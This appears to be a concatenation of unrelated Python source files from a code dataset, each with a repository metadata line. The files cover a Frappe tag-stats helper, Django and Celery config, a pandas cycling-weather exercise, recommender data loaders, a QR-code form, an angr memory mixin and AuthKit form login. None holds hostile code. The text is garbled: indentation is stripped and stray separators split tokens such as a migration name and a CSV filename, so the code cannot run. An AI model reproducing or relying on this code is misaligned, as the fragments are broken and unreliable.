#filters=["ifnull(`%s`,'')!=''" % tag], group_by=tag, as_list=True)
filters = filters + ["ifnull(`%s`,'')!=''" % tag], group_by = tag, as_list = True)
if tag=='_user_tags':
stats[tag] = scrub_user_tags(tagcount)
stats[tag].append(["No Tags", frappe.get_list(doctype,
fields=[tag, "count(*)"],
filters=filters +["({0} = ',' or {0} is null)".format(tag)], as_list=True)[0][1]])
else:
stats[tag] = tagcount
return stats
@frappe.whitelist()
def get_filter_dashboard_data(stats, doctype, filters=[]):
"""get tags info"""
import json
tags = json.loads(stats)
if filters:
filters = json.loads(filters)
stats = {}
columns = frappe.db.get_table_columns(doctype)
for tag in tags:
if not tag["name"] in columns: continue
tagcount = []
if tag["type"] not in ['Date', 'Datetime']:
tagcount = frappe.get_list(doctype,
fields=[tag["name"], "count(*)"],
filters = filters + ["ifnull(`%s`,'')!=''" % tag["name"]],
group_by = tag["name"],
as_list = True)
if tag["type"] not in ['Check','Select','Date','Datetime','Int',
'Float','Currency','Percent'] and tag['name'] not in ['docstatus']:
stats[tag["name"]] = list(tagcount)
if stats[tag["name"]]:
data =["No Data", frappe.get_list(doctype,
fields=[tag["name"], "count(*)"],
filters=filters + ["({0} = '' or {0} is null)".format(tag["name"])],
as_list=True)[0][1]]
if data and data[1]!=0:
stats[tag["name"]].append(data)
else:
stats[tag["name"]] = tagcount
return stats
def scrub_user_tags(tagcount):
"""rebuild tag list for tags"""
rdict = {}
tagdict = dict(tagcount)
for t in tagdict:
if not t:
continue
alltags = t.split(',')
for tag in alltags:
if tag:
if not tag in rdict:
rdict[tag] = 0
rdict[tag] += tagdict[t]
rlist = []
for tag in rdict:
rlist.append([tag, rdict[tag]])
return rlist
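# Illustrative example (hypothetical tags): scrub_user_tags([(",a,b", 2), (",a", 1)])
# would return [["a", 3], ["b", 2]] (order may vary, as it comes from a dict).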
# used in building query in queries.py
def get_match_cond(doctype):
cond = DatabaseQuery(doctype).build_match_conditions()
return ((' and ' + cond) if cond else "").replace("%", "%%")
def build_match_conditions(doctype, as_condition=True):
match_conditions = DatabaseQuery(doctype).build_match_conditions(as_condition=as_condition)
if as_condition:
return match_conditions.replace("%", "%%")
else:
return match_conditions
def get_filters_cond(doctype, filters, conditions):
if filters:
flt = filters
if isinstance(filters, dict):
filters = filters.items()
flt = []
for f in filters:
if isinstance(f[1], basestring) and f[1][0] == '!':
flt.append([doctype, f[0], '!=', f[1][1:]])
|
HEG-Arc/Appagoo | appagoo/config/__init__.py | Python | bsd-3-clause | 288 | 0 | # -*- coding: utf-8 -*-
from __future__ import absolute_import
from .local import Local # noqa
from .production import Production  # noqa
# This will make sure the app is always imported when
# Django starts so that shared_task will use this app.
from .celery import app as celery_app
|
Vauxoo/website | website_lazy_load_image/models/__init__.py | Python | agpl-3.0 | 25 | 0 | from . import ir_ui_view
|
mohanprasath/Course-Work | data_analysis/uh_data_analysis_with_python/hy-data-analysis-with-python-spring-2020/part05-e02_cycling_weather/src/cycling_weather.py | Python | gpl-3.0 | 1,517 | 0.009967 | #!/usr/bin/env python3
import pandas as pd
def split_date(df):
days = {"ma": "Monday", "ti": "Tuesday", "ke": "Wednesday", "to": "Thuday", "pe": "Friday", "la": "Satday", "su": "Sunday"}
months = {"tammi": 1, "helmi": 2, "maalis": 3, "huhti": 4, "touko": 5, "kesä": 6,
"heinä": 7, "elo": 8, "syys": 9, "loka": 10, "marras": 11, "joulu": 12,}
d = df["Päivämäärä"].str.split(expand=True)
d.columns = ["Weekday", "Day", "Month", "Year", "Hour"]
hourmin = d["Hour"].str.split(":", expand=True)
d["Hour"] = hourmin.iloc[:, 0]
d["Weekday"] = d["Weekday"].map(days)
d["Month"] = d["Month"].map(months)
d = d.astype({"Weekday": object, "Day": int, "Month": int, "Year": int, "Hour": int})
return d
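# Illustrative input/output (hypothetical row): a "Päivämäärä" value such as
# "ke 4 tammi 2017 14:00" becomes Weekday="Wednesday", Day=4, Month=1,
# Year=2017, Hour=14 after split_date above.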
def cycling_weather():
# file 1
df = pd.read_csv("src/Helsingin_pyorailijamaarat.csv", sep=";")
df = df.dropna(how='all') # remove rows with only missing values
df = df.dropna(how='all', axis='columns') # remove columns with only missing values
split_df = split_date(df)
df = df.drop(columns="Päivämäärä")
pyo_df = pd.concat([split_df, df], axis=1)
# file 2
wea_df = pd.read_csv("src/kumpula-weather-2017.cs | v", sep=",")
wea_df = wea_df.rename(columns = {'m': 'Month', 'd': 'Day'}, index=str)
# merging
    merged_df = pd.merge(pyo_df, wea_df)
merged_df = merged_df.drop(["Time zone", "Time"], axis=1)
return merged_df
def main():
df = cycling_weather()
return
if __name__ == "__main__":
main()
|
diego-carvalho/FAiR | app/src/loadData.py | Python | mit | 5,565 | 0.000719 | # -*- coding: utf-8 -*-
import numpy as np
import sys
def load_data_test(file_test, window):
# read the test data and mount the matrix
file_test = open(file_test, 'r')
dic_u_test = {}
dic_i_test = {}
for line in file_test:
try:
line = line.rstrip()
values = line.split("::")
value_row = values[0]
value_col = values[1]
value_data = float(values[2])
# test = values[4]
if dic_u_test.get(value_row, False):
dic_u_test[value_row][value_col] = value_data
else:
dic_u_test[value_row] = {}
dic_u_test[value_row][value_col] = value_data
if dic_i_test.get(value_col, False):
dic_i_test[value_col][value_row] = value_data
else:
dic_i_test[value_col] = {}
dic_i_test[value_col][value_row] = value_data
except:
print(str(sys.exc_info()[0]))
print('error in format of test file: %s' % file_test.name)
window.loader_window.windowApp.destroy()
window.msgError('error in format of test file: %s' % file_test.name)
raise
file_test.close()
print('read the test data')
# reading end
# return the data matrix
return dic_u_test, dic_i_test
def load_data_training(file_training, window):
# read the training data and mount the matrix
file_training = open(file_training, 'r')
dic_u_training = {}
dic_i_training = {}
amount_ratings = 0
for line in file_training:
try:
amount_ratings += 1
line = line.rstrip()
values = line.split("::")
value_row = values[0]
value_col = values[1]
value_data = float(values[2])
# test = values[4]
if dic_u_training.get(value_row, False):
dic_u_training[value_row][value_col] = value_data
else:
dic_u_training[value_row] = {}
dic_u_training[value_row][value_col] = value_data
if dic_i_training.get(value_col, False):
dic_i_training[value_col][value_row] = value_data
else:
dic_i_training[value_col] = {}
dic_i_training[value_col][value_row] = value_data
except:
print(str(sys.exc_info()[0]))
print('error in format of training file: %s' % file_training.name)
window.loader_window.windowApp.destroy()
window.msgError('error in format of training file: %s' % file_training.name)
raise
file_training.close()
print('read the training data')
# reading end
# return the data matrix
return dic_u_training, dic_i_training, amount_ratings
def load_data_topN(file_top_n):
file_top_n = open(file_top_n, "r")
lines = []
ids = []
ratings = []
dic_u_top = {}
cont_u = 0
for line in file_top_n:
aux = line.split()
lines.append(aux[1:])
dic_u_top[cont_u] = aux[0]
cont_u += 1
for i in range(len(lines)):
if len(lines[i]) != 100:
print('i : %d l : %d' % (i, len(lines[i])))
id_aux = []
ra_aux = []
for j in range(len(lines[i])):
id_aux.append(lines[i][j].split(":")[0])
ra_aux.append(float(lines[i][j].split(":")[1]))
ids.append(id_aux)
ratings.append(ra_aux)
matrix_top_n = np.array(ids)
matrix_ratings = np.array(ratings)
file_top_n.close()
print('read the topN data')
# reading end
return dic_u_top, matrix_top_n, matrix_ratings
def load_data_mymedialite(file_top_n):
file_top_n = open(file_top_n, "r")
lines = []
ids = []
ratings = []
dic_u_top = {}
cont_u = 0
for line in file_top_n:
aux = line.split()
dic_u_top[cont_u] = aux[0]
cont_u += 1
aux = aux[1][1:]
aux = aux[:-1].split(",")
lines.append(aux)
for i in range(len(lines)):
if len(lines[i]) != 100:
print('i : %d l : %d' % (i, len(lines[i])))
id_aux = []
ra_aux = []
for j in range(len(lines[i])):
id_aux.append(lines[i][j].split(":")[0])
            ra_aux.append(float(lines[i][j].split(":")[1]))
ids.append(id_aux)
ratings.append(ra_aux)
matrix_top_n = np.array(ids)
matrix_ratings = np.array(ratings)
file_top_n.close()
print('read the topN data')
# reading end
return dic_u_top, matrix_top_n, matrix_ratings
def convert_file_mymedialite(file_top_n, output_file):
# read the training data and mount the ma | trix
file_top_n = open(file_top_n, 'r')
file_out = open(output_file + "file_mymedialite_topn.txt", 'w')
lines = []
ids = []
ratings = []
dic_u_top = {}
cont_u = 0
for line in file_top_n:
aux = line.split()
user = aux[0]
aux = aux[1][1:]
aux = aux[:-1].split(",")
file_out.write("%s %s\n" % (user, " ".join(aux)))
def load_data_feature(file_feature):
# create the dictionary of features
file_in = open(file_feature, "r")
dic_features = {}
amount_features = len(file_in.readline().split("::"))
for line in file_in:
line = line.rstrip()
values = line.split(" ")
values = list(map(int, values))
dic_features[str(values[0])] = values[1:]
file_in.close()
# reading end
return dic_features, amount_features
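# Illustrative feature file (hypothetical): after the "::"-separated header line,
# a row "42 1 0 1" yields dic_features["42"] == [1, 0, 1].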
|
DemocracyClub/yournextrepresentative | ynr/apps/elections/migrations/0009_make_election_slug_unique.py | Python | agpl-3.0 | 356 | 0.002809 | from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [("elections", "000 | 8_remove_artificial_start_and_end_dates")]
operations = [
migrations.AlterField(
model_name="election",
name="slug",
            field=models.CharField(unique=True, max_length=128),
)
]
|
montenegroariel/sigos | apps/afiliados/forms.py | Python | gpl-3.0 | 5,885 | 0.003569 | import datetime
import qrcode
from django import forms
from django.conf import settings
from apps.complementos.afiliados.models import Plan
from lib.forms import EstiloForm
from apps.personas.models import Sexo
from apps.complementos.personas.models import EstadoCivil
from .models import Titular, Adherente, Parentesco
from apps.empresas.models import Empresa
class TitularForm(EstiloForm, forms.ModelForm):
numero_ficha = forms.IntegerField(required=False, widget=forms.NumberInput())
dni = forms.CharField(required=True, widget=forms.NumberInput())
apellido = forms.CharField(required=True, widget=forms.TextInput())
nombre = forms.CharField(required=True, widget=forms.TextInput())
fecha_nacimiento = forms.DateField(required=False, widget=forms.DateInput())
sexo = forms.ModelChoiceField(required=False, queryset=Sexo.objects.all(), widget=forms.Select())
direccion = forms.CharField(required=True, widget=forms.TextInput())
telefono = forms.CharField(required=False, widget=forms.TextInput())
mail = forms.EmailField(required=False, widget=forms.EmailInput())
estado_civil = forms.ModelChoiceField(required=True, queryset=EstadoCivil.objects.all(), widget=forms.Select())
    empresa = forms.ModelChoiceField(required=True, queryset=Empresa.objects.all(), widget=forms.Select())
alta_afiliado = forms.BooleanField(required=False, widget=forms.CheckboxInput())
codigo_qr = forms.ImageField(required=False, widget=forms.FileInput())
codigo_seguridad = forms.IntegerField(required=False)
cuil = forms.CharField(required=False, widget=forms.TextInput())
    plan = forms.ModelChoiceField(queryset=Plan.objects.all(), widget=forms.Select())
pendiente_revision = forms.BooleanField(required=False, initial=False, widget=forms.CheckboxInput())
causa_revision = forms.CharField(required=False, widget=forms.Textarea())
embarazada = forms.BooleanField(required=False, initial=False, widget=forms.CheckboxInput())
meses_embarazo = forms.DateField(required=False, widget=forms.DateInput())
class Meta:
model = Titular
exclude = ['codigo']
# fields = '__all__'
def clean_nombre(self):
return self.cleaned_data["nombre"].upper()
def clean_apellido(self):
return self.cleaned_data["apellido"].upper()
def clean_codigo_qr(self):
if 'dni' in self.cleaned_data:
qr = qrcode.QRCode(
version=1,
error_correction=qrcode.constants.ERROR_CORRECT_L,
box_size=6,
border=2,
)
dni = self.cleaned_data['dni']
qr.add_data('http://sigos.seostax.com/qr/' + dni)
qr.make(fit=True)
img = qr.make_image()
img_path = settings.MEDIA_ROOT+'/qr/'+dni+'.png'
img.save(img_path)
self.cleaned_data['codigo_qr'] = 'qr/'+dni+'.png'
return self.cleaned_data['codigo_qr']
class AdherenteForm(EstiloForm, forms.ModelForm):
dni = forms.CharField(required=True, widget=forms.NumberInput())
apellido = forms.CharField(required=True, widget=forms.TextInput())
nombre = forms.CharField(required=True, widget=forms.TextInput())
direccion = forms.CharField(required=False, widget=forms.TextInput())
fecha_nacimiento = forms.DateField(required=True, widget=forms.DateInput())
sexo = forms.ModelChoiceField(required=False, queryset=Sexo.objects.all(), widget=forms.Select())
telefono = forms.CharField(required=False, widget=forms.TextInput())
titular = forms.ModelChoiceField(label='', required=True, queryset=Titular.objects.all(),
widget=forms.Select(attrs=({'hidden': 'hidden'})))
parentesco = forms.ModelChoiceField(required=True, queryset=Parentesco.objects.all(), widget=forms.Select())
certificado_escolaridad = forms.BooleanField(required=False, widget=forms.CheckboxInput())
certificado_escolaridad_fecha = forms.DateField(required=False)
codigo_seguridad = forms.IntegerField(required=False)
plan = forms.ModelChoiceField(queryset=Plan.objects.all(), widget=forms.Select())
pendiente_revision = forms.BooleanField(required=False, initial=False, widget=forms.CheckboxInput())
causa_revision = forms.CharField(required=False, widget=forms.Textarea())
embarazada = forms.BooleanField(required=False, initial=False, widget=forms.CheckboxInput())
meses_embarazo = forms.DateField(required=False, widget=forms.DateInput())
def clean_categoria(self):
data = self.cleaned_data['categoria']
return data
class Meta:
model = Adherente
exclude = ['codigo']
def clean_fecha_nacimiento(self):
data = self.cleaned_data["fecha_nacimiento"]
today = datetime.date.today()
resultado = today.year - data.year - ((today.month, today.day) < (data.month, data.day))
#if resultado <=1:
# raise ValidationError("Verifique la fecha ingresada, este Adherente todavia no cumplio un año")
return data
def clean_nombre(self):
return self.cleaned_data["nombre"].upper()
def clean_apellido(self):
return self.cleaned_data["apellido"].upper()
def clean_codigo_qr(self):
if 'dni' in self.cleaned_data:
qr = qrcode.QRCode(
version=1,
error_correction=qrcode.constants.ERROR_CORRECT_L,
box_size=6,
border=2,
)
dni = self.cleaned_data['dni']
qr.add_data('http://sigos.seostax.com/qr/' + dni)
qr.make(fit=True)
img = qr.make_image()
img_path = settings.MEDIA_ROOT+'/qr/'+dni+'.png'
img.save(img_path)
self.cleaned_data['codigo_qr'] = 'qr/'+dni+'.png'
return self.cleaned_data['codigo_qr']
|
bjornaa/ladim | examples/obstacle/animate.py | Python | mit | 1,379 | 0 | import matplotlib.pyplot as plt
from matplotlib.animation import FuncAnimation
from postladim import ParticleFile
from gridforce_analytic import Grid
# Particle file
particle_file = "obstacle.nc"
# Get the grid information
grid = Grid(None)
imax, jmax = grid.imax, grid.jmax
# L = grid.L
R = grid.R
X0 = grid.X0
# particle_file
pf = ParticleFile(particle_file)
num_times = pf.num_times
# Set up the plot area
fig = plt.figure(figsize=(12, 8))
ax = plt.axes(xlim=(0, imax), ylim=(0, jmax), aspect="equal")
# Plot the semicircular obstacle
circle = plt.Circle((X0, 0), R, color="g")
ax.add_artist(circle)
# Plot initial particle distribution
X, Y = pf.position(0)
particle_dist, = ax.plot(X, Y, ".", color="red", markeredgewidth=0.5, lw=0.5)
# title = ax.set_title(pf.time(0))
time0 = pf.time(0) # Save start-time
timestr = "00:00"
timestamp = ax.text(0.02, 0.93, timestr, fontsize=16, transform=ax.transAxes)
# Update function
def animate(t):
X, Y = pf.position(t)
particle_dist.set_data(X, Y)
# Time since start in minutes
dtime = (pf.time(t) - time0) / 60
dtimestr = str(dtime)
timestamp.set_text(dtimestr)
return particle_dist, timestamp
# Do the animation
anim = FuncAnimation(
fig,
animate,
frames=num_times,
interval=20,
repeat=True,
repeat_delay=500,
blit=True,
)
# anim.save("obstacle.mp4")
plt.show()
|
jss-emr/openerp-7-src | openerp/addons/account_budget/wizard/account_budget_crossovered_summary_report.py | Python | agpl-3.0 | 2,217 | 0.002255 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import time
from openerp.osv import fields, osv
class account_budget_crossvered_summary_report(osv.osv_memory):
"""
This wizard provides the crossovered budget summary report'
"""
_name = 'account.budget.crossvered.summary.report'
_description = 'Account Budget crossvered summary report'
_columns = {
'date_from': fields.date('Start of period', required=True),
'date_to': fields.date('End of period', required=True),
}
_defaults= {
'date_from': lambda *a: time.strftime('%Y-01-01'),
'date_to': lambda *a: time.strftime('%Y-%m-%d'),
}
def check_report(self, cr, uid, ids, context=None):
if context is None:
context = {}
data = self.read(cr, uid, ids, context=context)[0]
datas = {
'ids': context.get('active_ids',[]),
            'model': 'crossovered.budget',
'form': data
}
datas['form']['report'] = 'analytic-one'
return {
'type': 'ir.actions.report.xml',
'report_name': 'crossovered.budget.report',
'datas': datas,
}
account_budget_crossvered_summary_report()
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
angr/angr | angr/storage/memory_mixins/paged_memory/page_backer_mixins.py | Python | bsd-2-clause | 8,238 | 0.005705 | from mmap import mmap
from typing import Union, List, Generator, Tuple
import logging
import claripy
import cle
from .paged_memory_mixin import PagedMemoryMixin
l = logging.getLogger(__name__)
BackerType = Union[bytes,bytearray,List[int]]
BackerIterType = Generator[Tuple[int,BackerType],None,None]
# since memoryview isn't pickleable, we make do...
class NotMemoryview:
def __init__(self, obj, offset, size):
self.obj = obj
self.offset = offset
self.size = size
def __getitem__(self, k):
return memoryview(self.obj)[self.offset:self.offset+self.size][k]
def __setitem__(self, k, v):
memoryview(self.obj)[self.offset:self.offset+self.size][k] = v
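# Editor's note (addition): NotMemoryview exists because pages must survive
# pickling even though memoryview objects cannot be pickled. Each
# __getitem__/__setitem__ rebuilds a memoryview over the window
# [offset, offset + size) of the backing object, so, illustratively:
#   view = NotMemoryview(bytearray(b"abcdef"), 2, 3)
#   bytes(view[:])  # -> b"cde"
#   view[0] = 0x58  # writes through: backing buffer becomes b"abXdef"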
class ClemoryBackerMixin(PagedMemoryMixin):
def __init__(self, cle_memory_backer: Union[None, cle.Loader, cle.Clemory] = None, **kwargs):
super().__init__(**kwargs)
if isinstance(cle_memory_backer, cle.Loader):
self._cle_loader = cle_memory_backer
self._clemory_backer = cle_memory_backer.memory
elif isinstance(cle_memory_backer, cle.Clemory):
self._cle_loader = None
self._clemory_backer = cle_memory_backer
else:
self._cle_loader = None
self._clemory_backer = None
def copy(self, memo):
o = super().copy(memo)
o._clemory_backer = self._clemory_backer
o._cle_loader = self._cle_loader
return o
def _initialize_page(self, pageno, force_default=False, **kwargs):
if self._clemory_backer is None or force_default:
return super()._initialize_page(pageno, **kwargs)
addr = pageno * self.page_size
try:
backer_iter: BackerIterType = self._clemory_backer.backers(addr)
backer_start, backer = next(backer_iter)
except StopIteration:
return super()._initialize_page(pageno, **kwargs)
if backer_start >= addr + self.page_size:
return super()._initialize_page(pageno, **kwargs)
        # Load data from backer
data = self._data_from_backer(addr, backer, backer_start, backer_iter)
permissions = self._cle_permissions_lookup(addr)
if permissions is None:
# There is no segment mapped at the start of the page.
# Maybe the end of the page is mapped instead?
            permissions = self._cle_permissions_lookup(addr + self.page_size - 1)
# see if this page supports creating without copying
if type(data) is NotMemoryview:
try:
new_from_shared = self.PAGE_TYPE.new_from_shared
except AttributeError:
data = claripy.BVV(bytes(data[:]))
else:
return new_from_shared(data, **self._page_kwargs(pageno, permissions))
new_page = PagedMemoryMixin._initialize_default_page(self, pageno, permissions=permissions, **kwargs)
new_page.store(0, data, size=self.page_size, page_addr=pageno*self.page_size, endness='Iend_BE', memory=self,
**kwargs)
return new_page
def _data_from_backer(self, addr: int, backer: BackerType, backer_start: int,
backer_iter: BackerIterType) -> claripy.ast.BV:
# initialize the page
if isinstance(backer, (bytes, bytearray, mmap)):
return self._data_from_bytes_backer(addr, backer, backer_start, backer_iter)
elif isinstance(backer, list):
return self._data_from_lists_backer(addr, backer, backer_start, backer_iter)
raise TypeError("Unsupported backer type %s." % type(backer))
def _calc_page_starts(self, addr: int, backer_start: int, backer_length: int) -> Tuple[int,int,int]:
# lord help me. why do I keep having to write code that looks like this
# why have I found myself entangled in a briar patch of address spaces embedded in other address spaces
if addr >= backer_start:
backer_first_relevant_byte = addr - backer_start
page_first_relevant_byte = 0
else:
backer_first_relevant_byte = 0
page_first_relevant_byte = backer_start - addr
transfer_size = backer_length - backer_first_relevant_byte
if page_first_relevant_byte + transfer_size > self.page_size:
transfer_size = self.page_size - page_first_relevant_byte
return backer_first_relevant_byte, page_first_relevant_byte, transfer_size
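    # Editor's note (addition): a worked example of the mapping above.
    # With page_size = 0x1000, a page at addr = 0x1000, and a backer that
    # starts at backer_start = 0x800 with backer_length = 0x1000:
    #   backer_first_relevant_byte = 0x1000 - 0x800 = 0x800
    #   page_first_relevant_byte   = 0
    #   transfer_size              = 0x1000 - 0x800 = 0x800
    # i.e. backer bytes [0x800:0x1000) land at page bytes [0x0:0x800).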
def _data_from_bytes_backer(self, addr: int, backer: Union[bytes,bytearray], backer_start: int,
backer_iter: Generator[Tuple[int,Union[bytes,bytearray]],None,None]) -> claripy.ast.BV:
if backer_start <= addr and backer_start + len(backer) >= addr + self.page_size:
# fast case
data = NotMemoryview(backer, addr-backer_start, self.page_size)
else:
page_data = bytearray(self.page_size)
while backer_start < addr + self.page_size:
backer_first_relevant_byte, page_first_relevant_byte, transfer_size = \
self._calc_page_starts(addr, backer_start, len(backer))
backer_relevant_data = memoryview(backer)[backer_first_relevant_byte:backer_first_relevant_byte+transfer_size]
page_data[page_first_relevant_byte:page_first_relevant_byte+transfer_size] = backer_relevant_data
try:
backer_start, backer = next(backer_iter)
except StopIteration:
break
data = claripy.BVV(bytes(page_data))
return data
def _data_from_lists_backer(self, addr: int, backer: List[int], backer_start: int,
backer_iter: Generator[Tuple[int,List[int]],None,None]) -> claripy.ast.BV:
page_data = [0] * self.page_size
while backer_start < addr + self.page_size:
backer_first_relevant_byte, page_first_relevant_byte, transfer_size = \
self._calc_page_starts(addr, backer_start, len(backer))
backer_relevant_data = backer[backer_first_relevant_byte:backer_first_relevant_byte + transfer_size]
page_data[page_first_relevant_byte:page_first_relevant_byte + transfer_size] = backer_relevant_data
try:
backer_start, backer = next(backer_iter)
except StopIteration:
break
data = claripy.Concat(*map(lambda v: claripy.BVV(v, self.state.arch.byte_width), page_data))
return data
def _cle_permissions_lookup(self, addr):
if self._cle_loader is None:
return None
seg = self._cle_loader.find_segment_containing(addr, skip_pseudo_objects=False)
if seg is None:
return None
out = 0
if seg.is_readable: out |= 1
if seg.is_writable: out |= 2
if seg.is_executable: out |= 4
return out
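# Editor's note (addition): the bit layout above follows the usual
# read=1 / write=2 / execute=4 convention, so e.g. a segment that is
# readable and executable yields 0b101 == 5.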
class DictBackerMixin(PagedMemoryMixin):
def __init__(self, dict_memory_backer=None, **kwargs):
super().__init__(**kwargs)
self._dict_memory_backer = dict_memory_backer
def copy(self, memo):
o = super().copy(memo)
o._dict_memory_backer = self._dict_memory_backer
return o
def _initialize_page(self, pageno: int, force_default=False, **kwargs):
page_addr = pageno * self.page_size
if self._dict_memory_backer is None or force_default:
return super()._initialize_page(pageno, **kwargs)
new_page = None
for addr, byte in self._dict_memory_backer.items():
            if page_addr <= addr < page_addr + self.page_size:
if new_page is None:
kwargs['allow_default'] = True
new_page = PagedMemoryMixin._initialize_default_page(self, pageno, **kwargs)
new_page.store(addr % self.page_size,
claripy.BVV(byte[0] if type(byte) is bytes else byte, self.state.arch.byte_width),
size=1, endness='Iend_BE', page_addr=page_addr, memory=self, **kwargs)
        if new_page is None:
            return super()._initialize_page(pageno, **kwargs)
cedadev/AuthKit | authkit/authenticate/form.py | Python | mit | 10,231 | 0.004692 | # -*- coding: utf-8 -*-
"""Form and cookie based authentication middleware
As with all the other AuthKit middleware, this middleware is described in
detail in the AuthKit manual and should be used via the
``authkit.authenticate.middleware`` function.
The option form.status can be set to "200 OK" if the Pylons error document
middleware is intercepting the 401 response and just showing the standard 401
error document. This will not happen in recent versions of Pylons (0.9.6)
because the multi middleware sets the environ['pylons.error_call'] key so that
the error documents middleware doesn't intercept the response.
From AuthKit 0.4.1 using 200 OK when the form is shown is now the default.
This is so that Safari 3 Beta displays the page rather than trying to
handle the response itself as a basic or digest authentication.
"""
from paste.auth.form import AuthFormHandler
from paste.request import parse_formvars
from authkit.authenticate import get_template, valid_password, \
    get_authenticate_function, strip_base, RequireEnvironKey, \
AuthKitAuthHandler
from authkit.authenticate.multi import MultiHandler, status_checker
import inspect
import logging
import urllib
log = logging.getLogger('authkit.authenticate.form')
def user_data(state):
return 'User data string'
def template(method=False):
t = """\
<html>
<head><title>Please Sign In</title></head>
<body>
<h1>Please Sign In</h1>
<form action="%s" method="post">
<dl>
<dt>Username:</dt>
<dd><input type="text" name="username"></dd>
<dt>Password:</dt>
<dd><input type="password" name="password"></dd>
</dl>
<input type="submit" name="authform" value="Sign In" />
</form>
</body>
</html>
"""
if method is not False:
t = t.replace('post', method)
return t
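# Editor's note (addition): template() returns a format string with a single
# %s slot for the form action, so rendering works like:
#   template() % '/login'       -> a POST form targeting /login
#   template('get') % '/login'  -> the same form submitted via GET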
class AttributeDict(dict):
def __getattr__(self, name):
if not self.has_key(name):
raise AttributeError('No such attribute %r'%name)
return self.__getitem__(name)
def __setattr__(self, name, value):
raise NotImplementedError(
'You cannot set attributes of this object directly'
)
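# Editor's note (addition): AttributeDict provides read-only attribute access
# over plain dict storage, e.g.
#   state = AttributeDict(environ={})
#   state.environ        # same as state['environ']
#   state.missing        # raises AttributeError
#   state.environ = {}   # raises NotImplementedError; item assignment
#                        # (state['environ'] = ...) still works, as used below.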
class FormAuthHandler(AuthKitAuthHandler, AuthFormHandler):
def __init__(
self,
app,
charset=None,
status="200 OK",
method='post',
action=None,
user_data=None,
**p
):
AuthFormHandler.__init__(self, app, **p)
self.status = status
self.content_type = 'text/html'
self.charset = charset
if self.charset is not None:
self.content_type = self.content_type + '; charset='+charset
self.method = method
self.action = action
self.user_data = user_data
def on_authorized(self, environ, start_response):
if self.user_data is not None:
state = environ.get('wsgiorg.state')
if not state:
environ['wsgiorg.state'] = state = AttributeDict()
state['environ'] = environ
state['start_response'] = start_response
environ['paste.auth_tkt.set_user'](userid=environ['REMOTE_USER'], user_data=self.user_data(state))
else:
environ['paste.auth_tkt.set_user'](userid=environ['REMOTE_USER'])
return self.application(environ, start_response)
def __call__(self, environ, start_response):
# Shouldn't ever allow a response if this is called via the
# multi handler
username = environ.get('REMOTE_USER','')
formvars = parse_formvars(environ, include_get_vars=True)
username = formvars.get('username')
password = formvars.get('password')
if username and password:
if self.authfunc(environ, username, password):
log.debug("Username and password authenticated successfully")
environ['AUTH_TYPE'] = 'form'
environ['REMOTE_USER'] = username
environ['REQUEST_METHOD'] = 'GET'
environ['CONTENT_LENGTH'] = ''
environ['CONTENT_TYPE'] = ''
del environ['paste.parsed_formvars']
return self.on_authorized(environ, start_response)
else:
log.debug("Username and password authentication failed")
else:
log.debug("Either username or password missing")
action = self.action or construct_url(environ)
log.debug("Form action is: %s", action)
# Inspect the function to see if we can pass it anything useful:
args = {}
kargs = {'environ':environ}
        if environ.has_key('wsgiorg.state'):
            kargs['state'] = environ['wsgiorg.state']
for name in inspect.getargspec(self.template)[0]:
if kargs.has_key(name):
args[name] = kargs[name]
if self.method != 'post':
args['method'] = self.method
content = self.template(**args) % (action)
if self.charset is not None:
content = content.encode(self.charset)
writable = start_response(
self.status,
[
('Content-Type', self.content_type),
('Content-Length', str(len(content))),
# Added for IE compatibility - see #54
('Pragma', 'no-cache'),
('Cache-Control', 'no-cache'),
]
)
return [content]
def construct_url(environ, with_query_string=True, with_path_info=True,
script_name=None, path_info=None, querystring=None):
"""Reconstructs the URL from the WSGI environment.
You may override SCRIPT_NAME, PATH_INFO, and QUERYSTRING with
the keyword arguments.
"""
url = '://'
host = environ.get('HTTP_X_FORWARDED_HOST', environ.get('HTTP_HOST'))
port = None
if ':' in host:
host, port = host.split(':', 1)
else:
# See if the request is proxied
host = environ.get('HTTP_X_FORWARDED_HOST', environ.get('HTTP_X_FORWARDED_FOR'))
if host is not None:
# Request was proxied, get the correct data
host = environ.get('HTTP_X_FORWARDED_HOST')
port = environ.get('HTTP_X_FORWARDED_PORT')
if port is None and environ.get('HTTP_X_FORWARDED_SSL') == 'on':
port = '443'
if not port:
log.warning(
'No HTTP_X_FORWARDED_PORT or HTTP_X_FORWARDED_SSL found '
'in environment, cannot '
'determine the correct port for the form action. '
)
if not host:
log.warning(
'No HTTP_X_FORWARDED_HOST found in environment, cannot '
'determine the correct hostname for the form action. '
'Using the value of HTTP_HOST instead.'
)
host = environ.get('HTTP_HOST')
else:
# Request was not proxied
if environ['wsgi.url_scheme'] == 'https':
port = 443
if host is None:
host = environ.get('HTTP_HOST')
if port is None:
port = environ.get('SERVER_PORT')
url += host
if port:
if str(port) == '443':
url = 'https'+url
elif str(port) == '80':
url = 'http'+url
else:
# Assume we are running HTTP on a non-standard port
url = 'http'+url+':%s' % port
else:
url = 'http'+url
if script_name is None:
url += urllib.quote(environ.get('SCRIPT_NAME',''))
else:
url += urllib.quote(script_name)
if with_path_info:
if path_info is None:
url += urllib.quote(environ.get('PATH_INFO',''))
else:
url += urllib.quote(path_info)
if with_query_string:
if querystring is None:
if environ.get('QUERY_STRING'):
url += '?' + environ['QUERY_STRING']
elif querystring:
url += '?' + querystring
return url
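# Editor's note (addition): for a simple non-proxied request, e.g.
#   environ = {'wsgi.url_scheme': 'http', 'HTTP_HOST': 'example.org',
#              'SERVER_PORT': '80', 'SCRIPT_NAME': '/app',
#              'PATH_INFO': '/login', 'QUERY_STRING': ''}
# construct_url(environ) returns 'http://example.org/app/login'. The
# X-Forwarded-* handling only runs when HTTP_HOST carries no explicit port.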
def load_form_config(
app,
auth_conf,
app_conf= |
